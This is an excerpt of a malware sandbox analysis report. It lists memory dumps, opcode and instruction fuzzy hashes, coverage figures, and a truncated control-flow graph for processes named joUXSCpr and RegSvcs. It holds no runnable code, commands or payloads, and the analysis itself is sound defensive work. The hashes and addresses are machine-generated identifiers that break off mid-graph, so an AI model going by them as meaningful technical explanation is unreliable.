                          • Instruction ID: 4ca8ac44a236701e1d178ca0ebdd3d1688fb5bb7c5575a6b958399f9587691e8
                          • Opcode Fuzzy Hash: 05156fc7eaaa9244b7e67e9fcc144c14d72d2dedbcfa184cf4b06bb4bcae9c7c
                          • Instruction Fuzzy Hash: C0715BB5E09218DFEF18CB95D586BADBBB7FF80301F14812AE412AB695CB709C41CB51
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4548723004dc605aaf1e160bcc8db1b932cbde09ba376af11270e0f16b1a4395
                          • Instruction ID: 95ff69d2c30d17175f1a772ed229d8ced520ed5a1cefbf8a5bb7a199b5dd5692
                          • Opcode Fuzzy Hash: 4548723004dc605aaf1e160bcc8db1b932cbde09ba376af11270e0f16b1a4395
                          • Instruction Fuzzy Hash: 14516C707002018FDB1AEF69C594B6AB7EAAF89314F144169E40ADB3A1DFB5EC41CB91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87ce28b6724bc220e203832e55c6b83d01b8bca2fbdcf0c278d4622d5178e9a2
                          • Instruction ID: f41767bff76a5b95e3fa02a4d31fc903277871859ada0dc3957f7caa5830c9eb
                          • Opcode Fuzzy Hash: 87ce28b6724bc220e203832e55c6b83d01b8bca2fbdcf0c278d4622d5178e9a2
                          • Instruction Fuzzy Hash: 72519F71B002099FDF08EFB488107AE7BB6BF89200F248569E445EB385DE39DD41CB95
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ed321917e57c6b0cc0cbbcc5633a3815988f9f182588446b956479f6c53e2c4
                          • Instruction ID: 27ec12ccc9cdda90d49748f6446de4e784b63dd3d02a00990351d29f7e7bafcb
                          • Opcode Fuzzy Hash: 4ed321917e57c6b0cc0cbbcc5633a3815988f9f182588446b956479f6c53e2c4
                          • Instruction Fuzzy Hash: EE417C707002059FDB1AEF68C584BAAB7FAAF89304F144469E40ADB351DBB5EC41CBA1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eaa65ed976ffcd26922fa4abfb2e7fac7f0b4ccb21bddb1a46f5466dddb2e2b8
                          • Instruction ID: a25c38bbeb41aa66c5a854e64fabddc4c179b38c36e8b4050800d72cc9bf9655
                          • Opcode Fuzzy Hash: eaa65ed976ffcd26922fa4abfb2e7fac7f0b4ccb21bddb1a46f5466dddb2e2b8
                          • Instruction Fuzzy Hash: C141DE71704610DFDB2C9A29D948BBAB7E6FB85310F04856EE40A9B241CBB5E846CB91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c9c83164ca78e571a91c4d548fead5ffeb214ce7e295e93575ab58f014e43e3
                          • Instruction ID: a7cbd56df9a0ca80565535f11cf705a6789feb04b41c14791f25f23ecf476d37
                          • Opcode Fuzzy Hash: 1c9c83164ca78e571a91c4d548fead5ffeb214ce7e295e93575ab58f014e43e3
                          • Instruction Fuzzy Hash: 2A31ACB4A14255CFCB08CFA9C9806AEFBBAFF86310F94822AE416D7645C375D9418B91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08cc2bfe657c97cdf219b9ff99e4e674e98b894e0599d1227b6e1ce21a699c84
                          • Instruction ID: 6e5684d7df76b8b4c6d0b456420298d8d1b045d4a59d4792afc32f85b087b65e
                          • Opcode Fuzzy Hash: 08cc2bfe657c97cdf219b9ff99e4e674e98b894e0599d1227b6e1ce21a699c84
                          • Instruction Fuzzy Hash: 67319EB4A14255CFDF08CFA9C9806AFF7BAFF86310F44422AE456D7685C374D9418B91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7aed2b9a94adbc578977936e697992cd8e3acbb75a415c05875f17082d881fc2
                          • Instruction ID: b43131b60aac2fb75326733d3228e133b51e69c16199ddb54a54251d90abcc53
                          • Opcode Fuzzy Hash: 7aed2b9a94adbc578977936e697992cd8e3acbb75a415c05875f17082d881fc2
                          • Instruction Fuzzy Hash: AD21AF757142108FCF18EB69E414A6E73EABF8966171540AAE906CB361EE71DC02CBA0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5bdadc6dc6b6f02e9a4c8c87043469fccdd182e1e2f5986e6135a9b452df8cf6
                          • Instruction ID: 61ce3d4a0a82d4a217f52130aed2f9fea9def786eb79d1ed8e2511f8e4e08718
                          • Opcode Fuzzy Hash: 5bdadc6dc6b6f02e9a4c8c87043469fccdd182e1e2f5986e6135a9b452df8cf6
                          • Instruction Fuzzy Hash: 7031D8B4E142099FCB44CFA9C581AAEFBF2FF88300F10956AD419A7714D7759A41CF51
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b2eecd6e5c1c3e34c5cf0f048a025ac733ada2174e4bd7381093e16f8de90eb
                          • Instruction ID: 3f4113a252b7b288195e121f28dd8c69cd2ffd35dadd18428a89b36f0d4b488e
                          • Opcode Fuzzy Hash: 2b2eecd6e5c1c3e34c5cf0f048a025ac733ada2174e4bd7381093e16f8de90eb
                          • Instruction Fuzzy Hash: 8031E4B4E042099FCB48CFA9C5819AEFBF6FF88300F10956AD819A7715E7759A41CF90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20bc027fa7c7dff55428e5eca947bbebdc3091b8925397cf90c3f7a4d7edc5bc
                          • Instruction ID: dbb80443e87138d1c1b79470ff087b9c938b5fad53184bbf2478296be7445b4b
                          • Opcode Fuzzy Hash: 20bc027fa7c7dff55428e5eca947bbebdc3091b8925397cf90c3f7a4d7edc5bc
                          • Instruction Fuzzy Hash: 0131F6B1E04219DFDB48CFA9C581AAEFBF6BF88300F10CAA99415A7714D7749A018F91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35eabf2a0ccbea9420adf7033e14200987d2ab0f1736f958b26ddf7a7c93b161
                          • Instruction ID: 93a48dd2823e1579f9403c4bf5bd313c2f6ce64c4b828e45ae200ca7c5a22588
                          • Opcode Fuzzy Hash: 35eabf2a0ccbea9420adf7033e14200987d2ab0f1736f958b26ddf7a7c93b161
                          • Instruction Fuzzy Hash: 59210071604344DFDB15DF58D8C0B26BBA5FB84618F24C5BDE80A4B686C336D807CBA2
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 112c7480eabf5cc99f6a8dcfbcfec4a7115e71ab9f5aeb8bd8e191412dfa60d5
                          • Instruction ID: 6193992c390be0f3a09993da698cdd767ab6a10fb7df94e221859fb4c90a7c54
                          • Opcode Fuzzy Hash: 112c7480eabf5cc99f6a8dcfbcfec4a7115e71ab9f5aeb8bd8e191412dfa60d5
                          • Instruction Fuzzy Hash: C2210471504344EFDB05DF94D9C0B26BBA6FB84728F24C5BDE8094B692C336D846CBA1
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65167f9af70c127cbaa2e36f4fc9bd24819176ebf5896f65c56862c21a496b2c
                          • Instruction ID: 7cc142551b5ae78b258efd33e194f9a29b3e792f371681e06f5371c8335b257d
                          • Opcode Fuzzy Hash: 65167f9af70c127cbaa2e36f4fc9bd24819176ebf5896f65c56862c21a496b2c
                          • Instruction Fuzzy Hash: EB3148B4A00208CFEB29DF64E684AACBBF9FB09301F4491A6E54ADB315CB709C40CF50
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e6ce460582e5dc00e23894c9a51df82ca49548c4dae8220b516fbddd1233984
                          • Instruction ID: d6f2554280ab0c0e3d35aeb8c7e2c72c8e11584f6cef50ce29e728b381240cf9
                          • Opcode Fuzzy Hash: 6e6ce460582e5dc00e23894c9a51df82ca49548c4dae8220b516fbddd1233984
                          • Instruction Fuzzy Hash: 9E314AB4A10208CFEB28DF64E585A98BBF9FB49301F4491AAE549DB351DF709C40CF50
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c059124bae10812ac7266a104e10ca5ef8add0f77e66de06591d2afd3cc0bce1
                          • Instruction ID: d776a6beac52855c777d42b879757e00a4775479477925c89d799de57bc54a7a
                          • Opcode Fuzzy Hash: c059124bae10812ac7266a104e10ca5ef8add0f77e66de06591d2afd3cc0bce1
                          • Instruction Fuzzy Hash: 3B2192755083809FCB03CF58D994711BF71EB46218F28C5EAD8498F2A7C33A9846CBA2
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db710a5c250a8b7be4c3b4b707987085429a760421b9b3e8b206388fd7e0a7b5
                          • Instruction ID: cd80292b5542afc9fee3f9e1180b2312905f969850ced5569efc9e2604c75993
                          • Opcode Fuzzy Hash: db710a5c250a8b7be4c3b4b707987085429a760421b9b3e8b206388fd7e0a7b5
                          • Instruction Fuzzy Hash: DE2147B4904249CFEB09DFA8D585AACBBFDFB0A305B555126E40ADB296DB709C00CF21
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d5d6e1bcf3f7a9e6fc9f5b8a31f2a6271460f5f0e5a8ed08369b586b350b1e1
                          • Instruction ID: 71cc010c7121eae0d125e181dfd211bbe18778376b560c0e2fbf0ad32a9692cf
                          • Opcode Fuzzy Hash: 0d5d6e1bcf3f7a9e6fc9f5b8a31f2a6271460f5f0e5a8ed08369b586b350b1e1
                          • Instruction Fuzzy Hash: A811E334704208EFD705EBB4D81576E7BB6FF85200F208299E0499B2D1CB359D47C751
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction ID: ee827e43ceb53bb14a32e25380961c8ffa541b91ca67f7e5ccfb3faa09fa6d03
                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction Fuzzy Hash: 8D11BE76504240DFCB02CF54C5C0B15BB72FB84628F24C6AEE8494B696C33AD84ACB91
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2057e13da2cef377edc3c2c4133ec8f6d8d723a87fb1d7842379a61c209c67dd
                          • Instruction ID: 8d805678d54468ace1a8bc011fd5e2dd77a10fbba49e48e873a28aa8d1a43240
                          • Opcode Fuzzy Hash: 2057e13da2cef377edc3c2c4133ec8f6d8d723a87fb1d7842379a61c209c67dd
                          • Instruction Fuzzy Hash: 5D11ED35704204DFDB09DB74C894BAABFB2BF89200F5486AAE049CB2A1CB36CC42C701

                          Execution Graph

                          Execution Coverage: 12.4%
                          Dynamic/Decrypted Code Coverage: 100%
                          Signature Coverage: 0%
                          Total number of Nodes: 17
                          Total number of Limit Nodes: 4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e622799a0451c8c5f82912f8e4ed36836152bf48397e19e4892b2ed7c141eba8
                          • Instruction ID: 0bb88f21cd35be533a29cffe358723f2a2fc43d5193a6f290419ffeb92112bea
                          • Opcode Fuzzy Hash: e622799a0451c8c5f82912f8e4ed36836152bf48397e19e4892b2ed7c141eba8
                          • Instruction Fuzzy Hash: 35D25B74E00205CFEB64DB68C598A9DBBF2FF89310F54C5A9D409AB291DB34ED85CB90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 781a5506d3adacdcc6de96ba10812d36be6d571b0b5489ae0535d9f17396b803
                          • Instruction ID: 314ee4675d3aa72b3d9eb1cfce096745f5fabb4ce575d4347900e6548ae8e72d
                          • Opcode Fuzzy Hash: 781a5506d3adacdcc6de96ba10812d36be6d571b0b5489ae0535d9f17396b803
                          • Instruction Fuzzy Hash: D3629F75F002048FEB54DB68D594AADBFF2EF88314F1485A9E406AB391EB35EC51CB90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b95d81d79ca95626a9cfb045bfd60608859f0250d506c81ca9a53d55aff8b7c
                          • Instruction ID: f2c61c52e53aaabc7500af8e2ae3639aa08788e074252a0a18726413811fa340
                          • Opcode Fuzzy Hash: 9b95d81d79ca95626a9cfb045bfd60608859f0250d506c81ca9a53d55aff8b7c
                          • Instruction Fuzzy Hash: F15270B0E002098FEF64DB68D5907ADBFB2FB49310F2495AAE405EB391DA36DD41CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1916 6b0c1f0-6b0c210 1917 6b0c212-6b0c215 1916->1917 1918 6b0c235-6b0c238 1917->1918 1919 6b0c217-6b0c230 1917->1919 1920 6b0c264-6b0c267 1918->1920 1921 6b0c23a-6b0c25f 1918->1921 1919->1918 1922 6b0c293-6b0c296 1920->1922 1923 6b0c269-6b0c28e 1920->1923 1921->1920 1926 6b0c298-6b0c29b 1922->1926 1927 6b0c309-6b0c312 1922->1927 1923->1922 1928 6b0c2b3-6b0c2b6 1926->1928 1929 6b0c29d-6b0c2ae 1926->1929 1930 6b0c318 1927->1930 1931 6b0c41b-6b0c424 1927->1931 1935 6b0c2e1-6b0c2e4 1928->1935 1936 6b0c2b8-6b0c2dc 1928->1936 1929->1928 1933 6b0c31d-6b0c320 1930->1933 1937 6b0c583-6b0c598 1931->1937 1938 6b0c42a-6b0c431 1931->1938 1940 6b0c322-6b0c346 1933->1940 1941 6b0c34b-6b0c34e 1933->1941 1943 6b0c304-6b0c307 1935->1943 1944 6b0c2e6-6b0c2ff 1935->1944 1936->1935 1953 6b0c59a-6b0c5bd 1937->1953 1954 6b0c52c-6b0c53f 1937->1954 1945 6b0c436-6b0c439 1938->1945 1940->1941 1948 6b0c350-6b0c356 1941->1948 1949 6b0c35b-6b0c35e 1941->1949 1943->1927 1943->1933 1944->1943 1950 6b0c443-6b0c446 1945->1950 1951 6b0c43b-6b0c43e 1945->1951 1948->1949 1956 6b0c3c0-6b0c3c3 1949->1956 1957 6b0c360-6b0c3bb 1949->1957 1960 6b0c450-6b0c453 1950->1960 1961 6b0c448-6b0c44d 1950->1961 1951->1950 1965 6b0c5bf-6b0c5c2 1953->1965 1984 6b0c544-6b0c547 1954->1984 1966 6b0c3c5-6b0c3c8 1956->1966 1967 6b0c3cd-6b0c3d0 1956->1967 1957->1956 1962 6b0c465-6b0c468 1960->1962 1963 6b0c455-6b0c45e 1960->1963 1961->1960 1971 6b0c488-6b0c48b 1962->1971 1972 6b0c46a-6b0c483 1962->1972 1969 6b0c460 1963->1969 1970 6b0c4b9-6b0c4c2 1963->1970 1974 6b0c5c4-6b0c5e0 1965->1974 1975 6b0c5e5-6b0c5e8 1965->1975 1966->1967 1976 6b0c3d2-6b0c3d8 1967->1976 1977 6b0c3dd-6b0c3e0 1967->1977 1969->1962 1970->1937 1979 6b0c4c8-6b0c4cc 1970->1979 1985 6b0c495-6b0c498 1971->1985 1986 6b0c48d-6b0c492 1971->1986 1972->1971 1974->1975 1982 6b0c608-6b0c60b 1975->1982 1983 6b0c5ea-6b0c603 1975->1983 1976->1977 1980 6b0c3f0-6b0c3f3 1977->1980 1981 6b0c3e2-6b0c3e9 1977->1981 1988 6b0c4d1-6b0c4d4 1979->1988 1990 6b0c3f5-6b0c411 1980->1990 1991 6b0c416-6b0c419 1980->1991 1981->1951 1989 6b0c3eb 1981->1989 1998 6b0c622-6b0c625 1982->1998 1999 6b0c60d-6b0c61b 1982->1999 1983->1982 1995 6b0c559-6b0c55c 1984->1995 1996 6b0c549-6b0c554 1984->1996 2000 6b0c4b4-6b0c4b7 1985->2000 2001 6b0c49a-6b0c4a9 1985->2001 1986->1985 2002 6b0c4d6-6b0c4f8 1988->2002 2003 6b0c4fd-6b0c500 1988->2003 1989->1980 1990->1991 1991->1931 1991->1945 2005 6b0c566-6b0c568 1995->2005 2006 6b0c55e-6b0c561 1995->2006 1996->1995 2007 6b0c627-6b0c640 1998->2007 2008 6b0c64d-6b0c650 1998->2008 1999->2007 2026 6b0c61d 1999->2026 2000->1970 2000->1988 2001->2006 2028 6b0c4af 2001->2028 2002->2003 2010 6b0c502-6b0c513 2003->2010 2011 6b0c518-6b0c51b 2003->2011 2017 6b0c56a 2005->2017 2018 6b0c56f-6b0c572 2005->2018 2006->2005 2034 6b0c66f-6b0c67b 2007->2034 2039 6b0c642-6b0c64c 2007->2039 2015 6b0c652-6b0c65c 2008->2015 2016 6b0c65d-6b0c65f 2008->2016 2010->2011 2011->1963 2022 6b0c521-6b0c524 2011->2022 2024 6b0c661 2016->2024 2025 6b0c666-6b0c669 2016->2025 2017->2018 2018->1917 2027 6b0c578-6b0c582 2018->2027 2022->1984 2032 6b0c526 2022->2032 2024->2025 2025->1965 2025->2034 2026->1998 2028->2000 2032->1954 2037 6b0c681-6b0c68a 2034->2037 2038 6b0c81a-6b0c824 2034->2038 2041 6b0c690-6b0c6af 2037->2041 2042 6b0c825-6b0c85e 2037->2042 2052 6b0c6b5-6b0c6be 2041->2052 2053 6b0c808-6b0c814 2041->2053 2047 6b0c860-6b0c863 2042->2047 2049 6b0c869-6b0c877 2047->2049 2050 6b0ca1f-6b0ca22 2047->2050 2057 6b0c87e-6b0c880 2049->2057 2054 6b0ca24-6b0ca40 2050->2054 2055 6b0ca45-6b0ca47 2050->2055 2052->2042 2056 6b0c6c4-6b0c6f3 call 6b06608 2052->2056 2053->2037 2053->2038 2054->2055 2058 6b0ca49 2055->2058 2059 6b0ca4e-6b0ca51 2055->2059 2075 6b0c735-6b0c74b 2056->2075 2076 6b0c6f5-6b0c72d 2056->2076 2061 6b0c882-6b0c885 2057->2061 2062 6b0c897-6b0c8c1 2057->2062 2058->2059 2059->2047 2063 6b0ca57-6b0ca60 2059->2063 2061->2063 2071 6b0ca14-6b0ca1e 2062->2071 2072 6b0c8c7-6b0c8d0 2062->2072 2073 6b0c8d6-6b0c9e5 call 6b06608 2072->2073 2074 6b0c9ed-6b0ca12 2072->2074 2073->2072 2125 6b0c9eb 2073->2125 2074->2063 2081 6b0c769-6b0c77f 2075->2081 2082 6b0c74d-6b0c761 2075->2082 2076->2075 2091 6b0c781-6b0c795 2081->2091 2092 6b0c79d-6b0c7b0 2081->2092 2082->2081 2091->2092 2097 6b0c7b2-6b0c7bc 2092->2097 2098 6b0c7be 2092->2098 2099 6b0c7c3-6b0c7c5 2097->2099 2098->2099 2101 6b0c7f6-6b0c802 2099->2101 2102 6b0c7c7-6b0c7cc 2099->2102 2101->2052 2101->2053 2103 6b0c7da 2102->2103 2104 6b0c7ce-6b0c7d8 2102->2104 2106 6b0c7df-6b0c7e1 2103->2106 2104->2106 2106->2101 2107 6b0c7e3-6b0c7ef 2106->2107 2107->2101 2125->2071
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a0d276c50d4b0869d0ef725cbcfb6f2fdc562a18f3231613adec108373f98fe
                          • Instruction ID: 2e17fbfd6eb01fb67c5e95a438b2012a78bf38938132fc3169950aa67db2cfae
                          • Opcode Fuzzy Hash: 6a0d276c50d4b0869d0ef725cbcfb6f2fdc562a18f3231613adec108373f98fe
                          • Instruction Fuzzy Hash: 8532A2B5B002058FEB54DF68D990BADBFB2FB88310F248569D505EB391DB39EC418B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2328 6b05650-6b0566d 2329 6b0566f-6b05672 2328->2329 2330 6b05683-6b05686 2329->2330 2331 6b05674-6b05678 2329->2331 2334 6b056b0-6b056b6 2330->2334 2335 6b05688-6b0568b 2330->2335 2332 6b05819-6b05826 2331->2332 2333 6b0567e 2331->2333 2333->2330 2336 6b056b8 2334->2336 2337 6b056cc-6b056d2 2334->2337 2338 6b05695-6b05698 2335->2338 2339 6b0568d-6b05690 2335->2339 2342 6b056bd-6b056c0 2336->2342 2343 6b05827-6b05853 2337->2343 2344 6b056d8-6b056e0 2337->2344 2340 6b0569a-6b056a0 2338->2340 2341 6b056ab-6b056ae 2338->2341 2339->2338 2345 6b056a6 2340->2345 2346 6b0578f-6b05799 2340->2346 2341->2334 2341->2342 2347 6b056c2-6b056c4 2342->2347 2348 6b056c7-6b056ca 2342->2348 2359 6b0585d-6b05860 2343->2359 2344->2343 2349 6b056e6-6b056f3 2344->2349 2345->2341 2353 6b057a0-6b057a2 2346->2353 2347->2348 2348->2337 2350 6b05702-6b05705 2348->2350 2349->2343 2352 6b056f9-6b056fd 2349->2352 2354 6b05707-6b05719 2350->2354 2355 6b0571e-6b05721 2350->2355 2352->2350 2358 6b057a7-6b057aa 2353->2358 2354->2355 2356 6b05723-6b05742 2355->2356 2357 6b05747-6b0574a 2355->2357 2356->2357 2363 6b05767-6b0576a 2357->2363 2364 6b0574c-6b05762 2357->2364 2361 6b057b2-6b057b5 2358->2361 2362 6b057ac-6b057ad 2358->2362 2365 6b05862-6b05873 2359->2365 2366 6b05878-6b0587b 2359->2366 2370 6b057c1-6b057c4 2361->2370 2371 6b057b7-6b057c0 2361->2371 2362->2361 2372 6b05778-6b0577b 2363->2372 2373 6b0576c-6b05773 2363->2373 2364->2363 2365->2366 2367 6b0587d-6b05884 2366->2367 2368 6b0588f-6b05892 2366->2368 2374 6b0588a 2367->2374 2375 6b0593e-6b05945 2367->2375 2376 6b058a3-6b058a6 2368->2376 2377 6b05894-6b0589e 2368->2377 2370->2340 2378 6b057ca-6b057cd 2370->2378 2380 6b0578a-6b0578d 2372->2380 2381 6b0577d-6b05783 2372->2381 2373->2372 2374->2368 2384 6b058c8-6b058cb 2376->2384 2385 6b058a8-6b058ac 2376->2385 2377->2376 2386 6b057e1-6b057e4 2378->2386 2387 6b057cf-6b057dc 2378->2387 2380->2346 2380->2358 2388 6b05785 2381->2388 2389 6b057ff-6b05802 2381->2389 2394 6b058e5-6b058e8 2384->2394 2395 6b058cd-6b058d1 2384->2395 2392 6b058b2-6b058ba 2385->2392 2393 6b05946-6b05983 2385->2393 2396 6b057e6-6b057f5 2386->2396 2397 6b057fa-6b057fd 2386->2397 2387->2386 2388->2380 2390 6b05807-6b05809 2389->2390 2398 6b05810-6b05813 2390->2398 2399 6b0580b 2390->2399 2392->2393 2400 6b058c0-6b058c3 2392->2400 2413 6b05985-6b05988 2393->2413 2403 6b058f2-6b058f5 2394->2403 2404 6b058ea-6b058f1 2394->2404 2395->2393 2401 6b058d3-6b058db 2395->2401 2396->2397 2397->2389 2397->2390 2398->2329 2398->2332 2399->2398 2400->2384 2401->2393 2408 6b058dd-6b058e0 2401->2408 2406 6b058f7-6b058fb 2403->2406 2407 6b0590f-6b05912 2403->2407 2406->2393 2410 6b058fd-6b05905 2406->2410 2411 6b05914-6b05918 2407->2411 2412 6b0592c-6b0592e 2407->2412 2408->2394 2410->2393 2416 6b05907-6b0590a 2410->2416 2411->2393 2417 6b0591a-6b05922 2411->2417 2418 6b05930 2412->2418 2419 6b05935-6b05938 2412->2419 2414 6b059a3-6b059a6 2413->2414 2415 6b0598a-6b0599c 2413->2415 2420 6b059c5-6b059c8 2414->2420 2421 6b059a8-6b059ba 2414->2421 2415->2421 2426 6b0599e 2415->2426 2416->2407 2417->2393 2422 6b05924-6b05927 2417->2422 2418->2419 2419->2359 2419->2375 2424 6b059e3-6b059e6 2420->2424 2425 6b059ca-6b059dc 2420->2425 2432 6b059c0 2421->2432 2433 6b05a49-6b05a4e 2421->2433 2422->2412 2428 6b05a01-6b05a04 2424->2428 2429 6b059e8-6b059fa 2424->2429 2430 6b05a06-6b05a19 2425->2430 2439 6b059de 2425->2439 2426->2414 2428->2430 2431 6b05a1c-6b05a1f 2428->2431 2429->2433 2442 6b059fc 2429->2442 2437 6b05a21-6b05a24 2431->2437 2438 6b05a64-6b05bd0 2431->2438 2432->2420 2435 6b05a51-6b05a54 2433->2435 2440 6b05a56-6b05a58 2435->2440 2441 6b05a5b-6b05a5e 2435->2441 2444 6b05a26-6b05a38 2437->2444 2445 